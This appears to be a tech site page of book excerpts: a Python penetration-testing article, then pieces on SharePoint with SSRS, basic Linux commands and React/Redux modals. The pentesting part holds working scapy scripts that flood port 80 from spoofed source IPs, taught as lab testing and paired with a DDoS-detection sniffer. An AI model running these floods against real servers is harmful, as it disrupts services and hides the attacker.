 In this article by the author, Mohit, of the book, Python Penetration Testing Essentials, Penetration (pen) tester and hacker are similar terms. The difference is that penetration testers work for an organization to prevent hacking attempts, while hackers hack for any purpose such as fame, selling vulnerability for money, or to exploit vulnerability for personal enmity. Lots of well-trained hackers have got jobs in the information security field by hacking into a system and then informing the victim of the security bug(s) so that they might be fixed. A hacker is called a penetration tester when they work for an organization or company to secure its system. A pentester performs hacking attempts to break the network after getting legal approval from the client and then presents a report of their findings. To become an expert in pentesting, a person should have deep knowledge of the concepts of their technology.  (For more resources related to this topic, see here.) Introducing the scope of pentesting In simple words, penetration testing is to test the information security measures of a company. Information security measures entail a company's network, database, website, public-facing servers, security policies, and everything else specified by the client. At the end of the day, a pentester must present a detailed report of their findings such as weakness, vulnerability in the company's infrastructure, and the risk level of particular vulnerability, and provide solutions if possible. The need for pentesting There are several points that describe the significance of pentesting: Pentesting identifies the threats that might expose the confidentiality of an organization Expert pentesting provides assurance to the organization with a complete and detailed assessment of organizational security Pentesting assesses the network's efficiency by producing huge amount of traffic and scrutinizes the security of devices such as firewalls, routers, and switches Changing or upgrading the existing infrastructure of software, hardware, or network design might lead to vulnerabilities that can be detected by pentesting In today's world, potential threats are increasing significantly; pentesting is a proactive exercise to minimize the chance of being exploited Pentesting ensures whether suitable security policies are being followed or not Consider an example of a well-reputed e-commerce company that makes money from online business. A hacker or group of black hat hackers find a vulnerability in the company's website and hack it. The amount of loss the company will have to bear will be tremendous. Components to be tested An organization should conduct a risk assessment operation before pentesting; this will help identify the main threats such as misconfiguration or vulnerability in: Routers, switches, or gateways Public-facing systems; websites, DMZ, e-mail servers, and remote systems DNS, firewalls, proxy servers, FTP, and web servers Testing should be performed on all hardware and software components of a network security system. Qualities of a good pentester The following points describe the qualities of good pentester. 
They should: Choose a suitable set of tests and tools that balance cost and benefits Follow suitable procedures with proper planning and documentation Establish the scope for each penetration test, such as objectives, limitations, and the justification of procedures Be ready to show how to exploit the vulnerabilities State the potential risks and findings clearly in the final report and provide methods to mitigate the risk if possible Keep themselves updated at all times because technology is advancing rapidly A pentester tests the network using manual techniques or the relevant tools. There are lots of tools available in the market. Some of them are open source and some of them are highly expensive. With the help of programming, a programmer can make his own tools. By creating your own tools, you can clear your concepts and also perform more R&D. If you are interested in pentesting and want to make your own tools, then the Python programming language is the best, as extensive and freely available pentesting packages are available in Python, in addition to its ease of programming. This simplicity, along with the third-party libraries such as scapy and mechanize, reduces code size. In Python, to make a program, you don't need to define big classes such as Java. It's more productive to write code in Python than in C, and high-level libraries are easily available for virtually any imaginable task. If you know some programming in Python and are interested in pentesting this book is ideal for you. Defining the scope of pentesting Before we get into pentesting, the scope of pentesting should be defined. The following points should be taken into account while defining the scope: You should develop the scope of the project in consultation with the client. For example, if Bob (the client) wants to test the entire network infrastructure of the organization, then pentester Alice would define the scope of pentesting by taking this network into account. Alice will consult Bob on whether any sensitive or restricted areas should be included or not. You should take into account time, people, and money. You should profile the test boundaries on the basis of an agreement signed by the pentester and the client. Changes in business practice might affect the scope. For example, the addition of a subnet, new system component installations, the addition or modification of a web server, and so on, might change the scope of pentesting. The scope of pentesting is defined in two types of tests: A non-destructive test: This test is limited to finding and carrying out the tests without any potential risks. It performs the following actions: Scans and identifies the remote system for potential vulnerabilities Investigates and verifies the findings Maps the vulnerabilities with proper exploits Exploits the remote system with proper care to avoid disruption Provides a proof of concept Does not attempt a Denial-of-Service (DoS) attack A destructive test: This test can produce risks. 
It performs the following actions: Attempts DoS and buffer overflow attacks, which have the potential to bring down the system Approaches to pentesting There are three types of approaches to pentesting: Black-box pentesting follows non-deterministic approach of testing You will be given just a company name It is like hacking with the knowledge of an outside attacker There is no need of any prior knowledge of the system It is time consuming White-box pentesting follows deterministic approach of testing You will be given complete knowledge of the infrastructure that needs to be tested This is like working as a malicious employee who has ample knowledge of the company's infrastructure You will be provided information on the company's infrastructure, network type, company's policies, do's and don'ts, the IP address, and the IPS/IDS firewall Gray-box pentesting follows hybrid approach of black and white box testing The tester usually has limited information on the target network/system that is provided by the client to lower costs and decrease trial and error on the part of the pentester It performs the security assessment and testing internally Introducing Python scripting Before you start reading this book, you should know the basics of Python programming, such as the basic syntax, variable type, data type tuple, list dictionary, functions, strings, methods, and so on. Two versions, 3.4 and 2.7.8, are available at python.org/downloads/. In this book, all experiments and demonstration have been done in Python 2.7.8 Version. If you use Linux OS such as Kali or BackTrack, then there will be no issue, because many programs, such as wireless sniffing, do not work on the Windows platform. Kali Linux also uses the 2.7 Version. If you love to work on Red Hat or CentOS, then this version is suitable for you. Most of the hackers choose this profession because they don't want to do programming. They want to use tools. However, without programming, a hacker cannot enhance his2 skills. Every time, they have to search the tools over the Internet. Believe me, after seeing its simplicity, you will love this language. Understanding the tests and tools you'll need To conduct scanning and sniffing pentesting, you will need a small network of attached devices. If you don't have a lab, you can make virtual machines in your computer. For wireless traffic analysis, you should have a wireless network. To conduct a web attack, you will need an Apache server running on the Linux platform. It will be a good idea to use CentOS or Red Hat Version 5 or 6 for the web server because this contains the RPM of Apache and PHP. For the Python script, we will use the Wireshark tool, which is open source and can be run on Windows as well as Linux platforms. Learning the common testing platforms with Python You will now perform pentesting; I hope you are well acquainted with networking fundamentals such as IP addresses, classful subnetting, classless subnetting, the meaning of ports, network addresses, and broadcast addresses. A pentester must be perfect in networking fundamentals as well as at least in one operating system; if you are thinking of using Linux, then you are on the right track. In this book, we will execute our programs on Windows as well as Linux. In this book, Windows, CentOS, and Kali Linux will be used. A hacker always loves to work on a Linux system. As it is free and open source, Kali Linux marks the rebirth of BackTrack and is like an arsenal of hacking tools. 
Kali Linux NetHunter is the first open source Android penetration testing platform for Nexus devices. However, some tools work on both Linux and Windows, but on Windows, you have to install those tools. I expect you to have some knowledge of Linux. Now, it's time to work with networking in Python.

Implementing a network sniffer by using Python

Before learning about the implementation of a network sniffer, let's learn about a couple of struct methods:

struct.pack(fmt, v1, v2, ...): This method returns a string that contains the values v1, v2, and so on, packed according to the given format.
struct.unpack(fmt, string): This method unpacks the string according to the given format.

Let's discuss the code:

import struct
ms= struct.pack('hhl', 1, 2, 3)
print (ms)
k= struct.unpack('hhl',ms)
print k

The output for the preceding code is as follows:

G:\Python\Networking\network>python str1.py
☺ ☻ ♥
(1, 2, 3)

First, import the struct module, and then pack the integers 1, 2, and 3 in the hhl format. The packed values are like machine code. The values are unpacked using the same hhl format; here, h means a short integer and l means a long integer. More details are provided in the subsequent sections.

Consider the situation of the client-server model; let's illustrate it by means of an example. Run the struct1.py file. The server-side code is as follows:

import socket
import struct
host = "192.168.0.1"
port = 12347
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
conn, addr = s.accept()
print "connected by", addr
msz= struct.pack('hhl', 1, 2, 3)
conn.send(msz)
conn.close()

The entire code is the same as we have seen previously, with msz= struct.pack('hhl', 1, 2, 3) packing the message and conn.send(msz) sending the message. Run the unstruc.py file. The client-side code is as follows:

import socket
import struct
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "192.168.0.1"
port =12347
s.connect((host,port))
msg= s.recv(1024)
print msg
print struct.unpack('hhl',msg)
s.close()

The client-side code accepts the message and unpacks it in the given format. The output for the client-side code is as follows:

C:\network>python unstruc.py
☺ ☻ ♥
(1, 2, 3)

The output for the server-side code is as follows:

G:\Python\Networking\program>python struct1.py
connected by ('192.168.0.11', 1417)

Now, you must have a fair idea of how to pack and unpack data.

Format characters

We have seen the format in the pack and unpack methods. In the following table, the C Type and Python type columns denote the conversion between C and Python types. The Standard size column refers to the size of the packed value in bytes.

Format | C Type             | Python type        | Standard size
x      | pad byte           | no value           |
c      | char               | string of length 1 | 1
b      | signed char        | integer            | 1
B      | unsigned char      | integer            | 1
?      | _Bool              | bool               | 1
h      | short              | integer            | 2
H      | unsigned short     | integer            | 2
i      | int                | integer            | 4
I      | unsigned int       | integer            | 4
l      | long               | integer            | 4
L      | unsigned long      | integer            | 4
q      | long long          | integer            | 8
Q      | unsigned long long | integer            | 8
f      | float              | float              | 4
d      | double             | float              | 8
s      | char[]             | string             |
p      | char[]             | string             |
P      | void *             | integer            |

Let's check what will happen when one value is packed in different formats:

>>> import struct
>>> struct.pack('b',2)
'\x02'
>>> struct.pack('B',2)
'\x02'
>>> struct.pack('h',2)
'\x02\x00'

We packed the number 2 in three different formats. From the preceding table, we know that b and B are 1 byte each, which means that they are the same size. However, h is 2 bytes.
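As a quick way to verify the sizes listed in the preceding table, struct.calcsize() reports the number of bytes a format string packs into. This is a short illustrative snippet using only the standard struct module, not part of the article's scripts:

import struct

# calcsize() reports the packed size in bytes. The '=' prefix asks for the
# standard sizes shown in the table; without it, native sizes are used, which
# can differ (for example, 'l' is often 8 bytes on a 64-bit Linux build).
for fmt in ('b', 'B', 'h', 'i', 'l', 'q', 'f', 'd'):
    print(fmt, struct.calcsize('=' + fmt))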
Now, let's use the long int, which is 8 bytes: >>> struct.pack('q',2) 'x02x00x00x00x00x00x00x00' If we work on a network, ! should be used in the following format. The ! is used to avoid the confusion of whether network bytes are little-endian or big-endian. For more information on big-endian and little endian, you can refer to the Wikipedia page on Endianness: >>> struct.pack('!q',2) 'x00x00x00x00x00x00x00x02' >>>  You can see the difference when using ! in the format. Before proceeding to sniffing, you should be aware of the following definitions: PF_PACKET: It operates at the device driver layer. The pcap library for Linux uses PF_PACKET sockets. To run this, you must be logged in as a root. If you want to send and receive messages at the most basic level, below the Internet protocol layer, then you need to use PF_PACKET. Raw socket: It does not care about the network layer stack and provides a shortcut to send and receive packets directly to the application. The following socket methods are used for byte-order conversion: socket.ntohl(x): This is the network to host long. It converts a 32-bit positive integer from the network to host the byte order. socket.ntohs(x): This is the network to host short. It converts a 16-bit positive integer from the network to host the byte order. socket.htonl(x): This is the host to network long. It converts a 32-bit positive integer from the host to the network byte order. socket.htons(x): This is the host to network short. It converts a 16-bit positive integer from the host to the network byte order. So, what is the significance of the preceding four methods? Consider a 16-bit number 0000000000000011. When you send this number from one computer to another computer, its order might get changed. The receiving computer might receive it in another form, such as 1100000000000000. These methods convert from your native byte order to the network byte order and back again. Now, let's look at the code to implement a network sniffer, which will work on three layers of the TCP/IP, that is, the physical layer (Ethernet), the Network layer (IP), and the TCP layer (port). Introducing DoS and DDoS In this section, we are going to discuss one of the most deadly attacks, called the Denial-of-Service attack. The aim of this attack is to consume machine or network resources, making it unavailable for the intended users. Generally, attackers use this attack when every other attack fails. This attack can be done at the data link, network, or application layer. Usually, a web server is the target for hackers. In a DoS attack, the attacker sends a huge number of requests to the web server, aiming to consume network bandwidth and machine memory. In a Distributed Denial-of-Service (DDoS) attack, the attacker sends a huge number of requests from different IPs. In order to carry out DDoS, the attacker can use Trojans or IP spoofing. In this section, we will carry out various experiments to complete our reports. Single IP single port In this attack, we send a huge number of packets to the web server using a single IP (which might be spoofed) and from a single source port number. This is a very low-level DoS attack, and this will test the web server's request-handling capacity. 
The following is the code of sisp.py: from scapy.all import * src = raw_input("Enter the Source IP ") target = raw_input("Enter the Target IP ") srcport = int(raw_input("Enter the Source Port ")) i=1 while True: IP1 = IP(src=src, dst=target) TCP1 = TCP(sport=srcport, dport=80) pkt = IP1 / TCP1 send(pkt,inter= .001) print "packet sent ", i i=i+1 I have used scapy to write this code, and I hope that you are familiar with this. The preceding code asks for three things, the source IP address, the destination IP address, and the source port address. Let's check the output on the attacker's machine:  Single IP with single port I have used a spoofed IP in order to hide my identity. You will have to send a huge number of packets to check the behavior of the web server. During the attack, try to open a website hosted on a web server. Irrespective of whether it works or not, write your findings in the reports. Let's check the output on the server side:  Wireshark output on the server This output shows that our packet was successfully sent to the server. Repeat this program with different sequence numbers. Single IP multiple port Now, in this attack, we use a single IP address but multiple ports. Here, I have written the code of the simp.py program: from scapy.all import *   src = raw_input("Enter the Source IP ") target = raw_input("Enter the Target IP ")   i=1 while True: for srcport in range(1,65535):    IP1 = IP(src=src, dst=target)    TCP1 = TCP(sport=srcport, dport=80)    pkt = IP1 / TCP1    send(pkt,inter= .0001)    print "packet sent ", i    i=i+1 I used the for loop for the ports Let's check the output of the attacker:  Packets from the attacker's machine The preceding screenshot shows that the packet was sent successfully. Now, check the output on the target machine:  Packets appearing in the target machine In the preceding screenshot, the rectangular box shows the port numbers. I will leave it to you to create multiple IP with a single port. Multiple IP multiple port In this section, we will discuss the multiple IP with multiple port addresses. In this attack, we use different IPs to send the packet to the target. Multiple IPs denote spoofed IPs. The following program will send a huge number of packets from spoofed IPs: import random from scapy.all import * target = raw_input("Enter the Target IP ")   i=1 while True: a = str(random.randint(1,254)) b = str(random.randint(1,254)) c = str(random.randint(1,254)) d = str(random.randint(1,254)) dot = "." src = a+dot+b+dot+c+dot+d print src st = random.randint(1,1000) en = random.randint(1000,65535) loop_break = 0 for srcport in range(st,en):    IP1 = IP(src=src, dst=target)    TCP1 = TCP(sport=srcport, dport=80)    pkt = IP1 / TCP1    send(pkt,inter= .0001)    print "packet sent ", i    loop_break = loop_break+1    i=i+1    if loop_break ==50 :      break In the preceding code, we used the a, b, c, and d variables to store four random strings, ranging from 1 to 254. The src variable stores random IP addresses. Here, we have used the loop_break variable to break the for loop after 50 packets. It means 50 packets originate from one IP while the rest of the code is the same as the previous one. Let's check the output of the mimp.py program:  Multiple IP with multiple ports In the preceding screenshot, you can see that after packet 50, the IP addresses get changed. Let's check the output on the target machine:  The target machine's output on Wireshark Use several machines and execute this code. 
In the preceding screenshot, you can see that the machine replies to the source IP. This type of attack is very difficult to detect because it is very hard to distinguish whether the packets are coming from a valid host or a spoofed host. Detection of DDoS When I was pursuing my Masters of Engineering degree, my friend and I were working on a DDoS attack. This is a very serious attack and difficult to detect, where it is nearly impossible to guess whether the traffic is coming from a fake host or a real host. In a DoS attack, traffic comes from only one source so we can block that particular host. Based on certain assumptions, we can make rules to detect DDoS attacks. If the web server is running only traffic containing port 80, it should be allowed. Now, let's go through a very simple code to detect a DDoS attack. The program's name is DDOS_detect1.py: import socket import struct from datetime import datetime s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8) dict = {} file_txt = open("dos.txt",'a') file_txt.writelines("**********") t1= str(datetime.now()) file_txt.writelines(t1) file_txt.writelines("**********") file_txt.writelines("n") print "Detection Start ......." D_val =10 D_val1 = D_val+10 while True:   pkt = s.recvfrom(2048) ipheader = pkt[0][14:34] ip_hdr = struct.unpack("!8sB3s4s4s",ipheader) IP = socket.inet_ntoa(ip_hdr[3]) print "Source IP", IP if dict.has_key(IP):    dict[IP]=dict[IP]+1    print dict[IP]    if(dict[IP]>D_val) and (dict[IP]<D_val1) :        line = "DDOS Detected "      file_txt.writelines(line)      file_txt.writelines(IP)      file_txt.writelines("n")   else: dict[IP]=1 In the previous code, we used a sniffer to get the packet's source IP address. The file_txt = open("dos.txt",'a') statement opens a file in append mode, and this dos.txt file is used as a logfile to detect the DDoS attack. Whenever the program runs, the file_txt.writelines(t1) statement writes the current time. The D_val =10 variable is an assumption just for the demonstration of the program. The assumption is made by viewing the statistics of hits from a particular IP. Consider a case of a tutorial website. The hits from the college and school's IP would be more. If a huge number of requests come in from a new IP, then it might be a case of DoS. If the count of the incoming packets from one IP exceeds the D_val variable, then the IP is considered to be responsible for a DDoS attack. The D_val1 variable will be used later in the code to avoid redundancy. I hope you are familiar with the code before the if dict.has_key(IP): statement. This statement will check whether the key (IP address) exists in the dictionary or not. If the key exists in dict, then the dict[IP]=dict[IP]+1 statement increases the dict[IP] value by 1, which means that dict[IP] contains a count of packets that come from a particular IP. The if(dict[IP]>D_val) and (dict[IP]<D_val1) : statements are the criteria to detect and write results in the dos.txt file; if(dict[IP]>D_val) detects whether the incoming packet's count exceeds the D_val value or not. If it exceeds it, the subsequent statements will write the IP in dos.txt after getting new packets. To avoid redundancy, the (dict[IP]<D_val1) statement has been used. The upcoming statements will write the results in the dos.txt file. Run the program on a server and run mimp.py on the attacker's machine. The following screenshot shows the dos.txt file. Look at that file. It writes a single IP 9 times as we have mentioned D_val1 = D_val+10. 
You can change the D_val value to set the threshold for the number of requests allowed from a particular IP; this threshold depends on the website's historical traffic statistics. I hope the preceding code will be useful for research purposes.

Detecting a DDoS attack

If you are a security researcher, the preceding program should be useful to you. You can modify the code so that only packets destined for port 80 are allowed.

Summary

In this article, we learned about penetration testing using Python. We also learned about sniffing using a Python script and about client-side validation, as well as how to bypass client-side validation and in which situations client-side validation is a good choice. We went through how to use Python to fill out a form and send parameters where the GET method is used. As a penetration tester, you should know how parameter tampering affects a business. Four types of DoS attacks were presented in this article: a single IP attack falls into the category of a DoS attack, while a multiple IP attack falls into the category of a DDoS attack. This section is helpful not only for pentesters but also for researchers. Taking advantage of the Python DDoS-detection script, you can extend the code to trigger actions that control or mitigate a DDoS attack on the server.

Resources for Article:

Further resources on this subject: Veil-Evasion [article] Using the client as a pivot point [article] Penetration Testing and Setup [article]


How to integrate SharePoint with SQL Server Reporting Services

Kunal Chaudhari
27 Jan 2018
5 min read
[box type="note" align="" class="" width=""]This article is an excerpt from a book written by Dinesh Priyankara and Robert C. Cain, titled SQL Server 2016 Reporting Services Cookbook.This book will help you get up and running with the latest enhancements and advanced query and reporting feature in SQL Server 2016.[/box] Today we will learn the steps to integrate SharePoint in the SQL Server Reporting services. We will create a Reporting Services SharePoint application, and set it up in a way that we are able to view reports when they are uploaded to SharePoint. Getting ready For this, all you'll need is a SharePoint instance you can work with. Do make sure you have an administrative access to the SharePoint site. If you have an Azure account, free or paid, you could set up a test instance of SharePoint and use it to follow the instructions in this article. Note the setup of such an Azure instance is outside the scope of this article. In this article, we assume you are using an on premise SharePoint installation. How to do it… Open the SharePoint 2016 Central Administration web page. Click on Manage service applications under the Application Management area: 3. The Service Applications tab now appears at the top of the page. Click on the New menu: 4. In the menu, find and click on the option for SQL Server Reporting Services Service Application: 5. You'll now need to fill out the information for the service application. Start at the top by giving it a good name, here we are using SSRS_SharePoint. 6. Presumably this is a new install, so you'll have to take the Create new application pool option. Give it an appropriate name; in this example, we used SSRS_SharePoint_Pool. 7. Select a security account to run under. Here we selected an account set up by our Active Directory administrator, which has permissions to SQL Server where SSRS is installed. 8. Enter the name of the server which has SQL Server 2016 Reporting Services installed. In this example, our machine is ACSrv. 9. By default, SharePoint will create a name for the database that includes a GUID (a long string of letters and numbers). You should absolutely rename this to eliminate the GUID, but ensure the database name will be unique. In this example, we used ReportingService_SharePoint. 10. Review the information so that it resembles the following figure, but don't hit OK quite yet as there are few more pieces of information to fill out. Scroll down in the dialog to continue: 11. After the database name, you'll need to indicate the authentication method. Assuming the credentials you entered for the security account came from your Active Directory administrator, you can take the default of Windows authentication. 12. Place a check mark beside the instance of SharePoint to associate this SSRS application with. Here there is only one, SharePoint – 80. 13. Click OK to continue. Assuming all goes well, you should see the following confirmation dialog. If so, click OK to proceed: 14. Now that SharePoint is configured, you'll now need to provide additional information to SQL Server. That is the purpose of this final screen, Provision Subscriptions and Alerts. Select the Download Script button, and save the generated SQL file: 15. Pass the SQL file to a database administrator to execute, or open it in SSMS and execute it yourself, assuming you have administrative rights on the SQL Server. SharePoint uses the concept of Service Applications to manage items which run under the hood of SharePoint. 
SQL Server Reporting Services is one such service application. By integrating it as a service application, end users can upload, modify, and view SSRS reports right within SharePoint. We began by generating a new Service Application, and picking Reporting Services from the list. We then needed to let SharePoint know where the SQL Server would be used to host both the database, as well as have a copy of Reporting Services for SharePoint installed. In addition, we also needed to provide security credentials for SharePoint to use to communicate with SQL Server. As the final step, we needed to configure SQL Server to now work with SharePoint. This was the purpose of the Provision Subscriptions and Alerts screen. Note there is an option to fill out a user name and credential; clicking OK would then have immediately executed scripts against the target SQL Server. In most mid-to large-size corporations, however, there will be controls in place to prevent this type of thing. Most companies will require a DBA to review scripts, or at the very least you'll want to keep a copy of the script in your source control system to be able to track what changes were made to a SQL Server. Hence, we suggest taking the action laid out in this article, namely downloading the script and executing it manually in the SQL Server Management Studio. To test your setup, we suggest creating a new report with embedded data sources and datasets. Upload that report to the server, and attempt to execute; it should display correctly if your install went well. If you enjoyed this excerpt, check out the book SQL Server 2016 Reporting Services Cookbook to know more about handling security and configuring email with SharePoint using Reporting Services.    
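One final practical note: if you prefer to run the downloaded provisioning script from a command prompt rather than from SSMS, a minimal sketch with sqlcmd looks like the following. The file name is made up purely for illustration (use whatever name you saved the script under), and you still need sufficient rights on the SQL Server instance.

sqlcmd -S ACSrv -E -i ProvisionSubscriptionsAlerts.sql

Here, -S points at the server used in this example, -E uses Windows authentication, and -i runs the script file.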

Learning Essential Linux Commands for Navigating the Shell Effectively 

Expert Network
16 Aug 2021
9 min read
Once we learn how to deploy an Ubuntu server, how to manage users, and how to manage software packages, we should take a moment to learn some important concepts and commands that will allow us to build more of the foundational knowledge that will serve us well while understanding the advanced concepts and treading the path of expertise. These foundational concepts include core Linux commands for navigating the shell.  This article is an excerpt from the book, Mastering Ubuntu Server, Third Edition by Jeremy “Jay” La Croix – A hands-on book that will teach you how to deploy, maintain and troubleshoot Ubuntu Server.    Learning essential Linux commands Building a solid competency on the command line is essential and effectively gives any system administrator or engineer superpowers. Our new abilities won’t allow us to leap tall buildings in a single bound, but will definitely enable us to execute terminal commands as if we’re ninjas. While we won’t master the art of using the command line in this section (that can only come with years and experience), we will definitely become more confident.  First, let’s talk about moving from one place to another within the Linux filesystem. Specifically, by “Linux filesystem”, I’m referring to the default structure of the various folders (also referred to as “directories”) contained within your Ubuntu installation. The Linux filesystem contains many important directories, each with their own designated purpose, which we’ll talk about in more detail in the book. Before we can explore that further, we’ll need to learn how to navigate from one directory to another. The first command we’ll cover in this section relative to navigating the filesystem will clarify the directory you’re currently working from. For that, we have the pwd command. The pwd command pwd stands for print working directory, and shows you where you currently are in the filesystem. If you run it, you may see output such as this:  Figure 4.1: Viewing the current working directory  In this example, when I ran pwd, the output informed me that my current working directory is /home/jay. This is known as your home directory and, by default, every user has one. This is where all the files for your user account will reside by default. Sure, you can create files anywhere you’d like, even outside your home directory if you have permission to do so or you use sudo. But just because you can doesn’t mean you should. As you’ll learn in this article, the Linux filesystem has a designated place for just about everything. But your home directory, located at /home/<username>, is yours. You own it, you control it—it’s your home on the server. In the early 2000s, Linux installations with a graphical user interface even depicted your home directory with an icon of a house.  Typically, files that you create in your home directory will have permission string similar to this:  -rw-rw-r-- 1 jay  jay      0 Jul  5 14:10 testfile.txt  You can see by default, files you create in your home directory are owned by your user, your group, and are readable by all three categories (user, group, and other).  The cd command To change our current directory and navigate to another, we can use the cd command along with a path we’d like to move to:  cd /etc  Now, I haven’t gone over the file and directory layout yet, so I just randomly picked the etc directory. The forward slash at the beginning designates the beginning of the filesystem. More on that later. 
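For example, a quick session that shows both commands together might look like this (the prompt is just an illustration; yours will show your own username and hostname):

jay@ubuntu:~$ cd /etc
jay@ubuntu:/etc$ pwd
/etc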
Now, we're in the /etc directory, and our command prompt has even changed as well:

Figure 4.2: Command prompt and pwd command after changing a directory

As you could probably guess, the cd command stands for change directory, and it's how you move your working directory from one place to another while navigating around. You can use the following command, for example, to return to the home directory:

cd /home/<user>

In fact, there are several ways to return home, a few of which are demonstrated in the following screenshot:

Figure 4.3: Other ways of navigating to the home directory

The first command, cd -, doesn't actually have anything to do with your home directory specifically. It's a neat trick to return you to whatever directory you were in most recently. For me, the cd - command took me to the previous directory I was just in, which just so happened to be /home/jay. The second command, cd /home/jay, took me directly to my home directory since I called out the entire path. The last command, cd ~, also took me to my home directory. This is because ~ is shorthand for the full path to your home directory, so you don't really ever have to type out the entire path to /home/<user>. You can just refer to that path simply as ~.

The ls command

Another essential command is ls. The ls command lists the contents of the current working directory. We probably don't have any contents in our home directory yet. But if we navigate to /etc by running cd /etc, as we did earlier, and then execute ls, we'll see that the /etc directory has a number of files in it. Go ahead and try it yourself and see:

cd /etc
ls

We didn't actually have to change our working directory to /etc just to list its contents. We could've just executed the following command:

ls /etc

Even better, we can run:

ls -l /etc

This gives us the contents in a long list, which I think is much easier to understand. It will show each directory or file entry on its own line, along with the permission string. You are probably already familiar with ls as well as ls -l, so I won't go into too much more detail here. The -l portion of the ls command in that example is known as an argument. I'm not referring to an argument such as the ever-ensuing debate in the Linux community over which command-line text editor is the best between vim and emacs (it's clearly vim). Instead, I'm referring to the concept of an argument in shell commands, which allows you to override the defaults or feed options to the command in some way, such as in this example, where we format the output of ls as a long list.

The rm command

The rm command is another one that we touched on earlier, when we were discussing manually removing the home directory of a user that was removed from the system. So, at this point, you're probably well aware of that command and what it does (it removes files and directories). It's a potentially dangerous command, as you could use it to accidentally remove something that you shouldn't have. We used the following command to remove the home directory of user dscully:

rm -r /home/dscully

As you can see, we're using the -r argument to alter the behavior of the rm command, which, by default, doesn't remove directories but only files. The -r argument instructs rm to remove everything recursively, even if it's a directory, and it will remove subdirectories of the path as well, so you'll definitely want to be careful with this command.
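To get a feel for rm -r without putting anything important at risk, you can practice on a throwaway directory first. Here is a small sketch (the directory and file names are arbitrary):

mkdir -p ~/scratch/subdir
touch ~/scratch/subdir/file1.txt
ls -l ~/scratch/subdir
rm -r ~/scratch

After the last command, the scratch directory and everything beneath it are gone, which is exactly the behavior you want to be mindful of on real data.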
As I've mentioned earlier in the book, if you use sudo with rm, you can hypothetically delete your entire Ubuntu installation!

Another option offered by rm is the -f argument, which is short for force; it tells rm not to prompt before removing things. This argument won't be needed as often, and use cases for it are outside the scope of this article. But keep in mind that it exists, should you need it.

The touch command

Another foundational command that's good to know is touch, which actually serves two purposes. First, assuming you have permission to do so in your current working directory, the touch command will create an empty file if it doesn't already exist. Second, the touch command will update the modification time of a file or directory if it does already exist:

Figure 4.4: Experimenting with the touch command

To illustrate this, in the related screenshot, I ran several commands. First, I ran the following command to create an empty file:

touch testfile.txt

That file didn't exist before, so when I ran ls -l afterward, it showed the newly created file with a size of 0 bytes. Next, I ran the touch testfile.txt command again a minute later, and you can see in the screenshot that the modification time went from 15:12 to 15:13.

When it comes to viewing the contents of a file, we'll get to that later on in the book, Mastering Ubuntu Server, Third Edition. And there are definitely more commands that we'll need to learn to build the basis of our foundation. But for now, let's take a break from the foundational concepts to understand the Linux filesystem layout better.

Summary

There are more Linux commands than you will ever be able to memorize. Most of us just memorize our favorite commands and variations of commands. You'll develop your own menu of these commands as you learn and expand your knowledge. In this article, we covered many of the foundational commands that are, for the most part, essential: pwd, cd, ls, rm, and touch were explored this time around.

About the author

Jeremy "Jay" La Croix is a technologist and open-source enthusiast, specializing in Linux. Jay is currently the director of Cloud Services at Adaptavist. He has 20 years of field experience across different firms as a Solutions Architect and holds a master's degree in Information Systems Technology Management from Capella University. In addition, Jay also has an active Linux-focused YouTube channel with over 186K followers and 15.9M views, available at LearnLinux.tv, where he posts instructional tutorial videos and other Linux-related content.

Creating Reusable Generic Modals in React and Redux

Mark Erikson
11 Nov 2016
6 min read
Modal dialogs are a common part of user interface design. As with most other parts of a UI, modals in a given application probably fall into two general categories: modals that are specific to a given feature or task, and modals that are intended to be generic and reusable. However, defining generic reusable modal components in a React/Redux application presents some interesting challenges. Here's one approach you can use to create generic reusable modals that can be used in a variety of contexts throughout a React/Redux application. First, we need a way to manage modals in general. In a typical object-oriented widget API, we might manually create an instance of a modal class, and pass in some kind of callback function to do something when it's closed. Here's what this might look like for a ColorPicker modal in an OOP API: const colorPickerInstance = new ColorPicker({ initialColor : "red", onColorPicked(color) { // do something useful with the "returned" color value } }); colorPickerInstance.show(); This presents some problems, though. Who really "owns" the ColorPicker? What happens if you want to show multiple modals stacked on each other? What happens with the ColorPicker instance while it's being displayed? In a React/Redux application, we really want our entire UI to be declarative, and to be an output of our current state. Rather than imperatively creating modal instances and calling show(), we'd really like any nested part of our UI to be able to "request" that some modal be shown, and have the state and UI updated appropriately to show the modal. Dan Abramov describes a wonderful approach on Stack Overflow to React/Redux modal management, in response to a question about displaying modal dialogs in Redux. It's worth reading his answer in full, but here's a summary: Dispatch an action that indicates you want to show a modal. This includes some string that can be used to identify which modal component should be shown, and includes any arbitrary values we want to be passed along to the rendered modal component: dispatch({ type : 'SHOW_MODAL", payload : { modalType : "SomeModalComponentIdentifier", modalProps : { // any arbitrary values here that we want to be passed to the modal } } }); Have a reducer that simply stores the modalType and modalProps values for 'SHOW_MODAL', and clears them for 'HIDE_MODAL'. Create a central component that connects to the store, retrieves the details ofwhat modal is open and what its props should be, looks up the correct component type, and renders it: import FirstModal from "./FirstModal"; import SecondModal from "./SecondModal"; // lookup table mapping string identifiers to component classes const MODAL_COMPONENTS = { FirstModal, SecondModal }; const ModalRoot = ({modalType, modalProps}) => { if(!modalType) return null; const SpecificModal = MODAL_COMPONENTS[modalType]; return <SpecificModal {...modalProps} /> } const mapState = state => state.modal; export default connect(mapState)(ModalRoot); From there, each modal component class can be connected to the store, retrieve any other needed data, and dispatch specific actions for both internal behavior as well as ultimately dispatching a 'HIDE_MODAL' action when it's ready to close itself. This way, the handling of modal display is centralized, and nested components don't have to "own" the details of showing a modal. Unfortunately, this pattern runs into a problem when we want to create and use a very generic component, such as a ColorPicker. 
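Before digging into that problem, here is a concrete reference for step 2 above: a minimal sketch of the modal reducer, assuming the SHOW_MODAL/HIDE_MODAL action shapes already shown, and assuming the reducer is mounted at state.modal (the key the ModalRoot's mapState expects):

const initialState = { modalType: null, modalProps: {} };

function modalReducer(state = initialState, action) {
  switch (action.type) {
    case 'SHOW_MODAL':
      // Remember which modal to render and the props it should receive
      return {
        modalType: action.payload.modalType,
        modalProps: action.payload.modalProps
      };
    case 'HIDE_MODAL':
      // Clearing the state makes ModalRoot render nothing
      return initialState;
    default:
      return state;
  }
}

With that in place, ModalRoot simply reads state.modal and renders the matching component. Now, back to the generic ColorPicker problem.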
